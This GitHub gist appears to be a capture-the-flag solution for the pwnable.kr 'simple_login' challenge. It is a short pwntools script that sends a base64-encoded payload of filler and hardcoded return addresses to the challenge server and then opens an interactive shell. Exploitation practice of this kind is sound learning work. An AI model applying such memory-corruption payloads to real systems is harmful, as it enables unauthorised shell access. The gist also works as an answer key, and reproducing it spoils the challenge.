Skip to content

Instantly share code, notes, and snippets.

@parksjin01
Last active March 16, 2017 20:58
Show Gist options
  • Select an option

  • Save parksjin01/7654623eaf4b50e81058f5e627bbf0c4 to your computer and use it in GitHub Desktop.

Select an option

Save parksjin01/7654623eaf4b50e81058f5e627bbf0c4 to your computer and use it in GitHub Desktop.
pwnable.kr simple_login writeup
from pwn import *
sh = remote('pwnable.kr', 9003)
sh.recv(1024)
sh.sendline('AAAA\x78\x92\x04\x08\x40\xeb\x11\x08'.encode('base64'))
a = sh.recv(10000)
a = a.split('\n')
print a[1]
sh.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment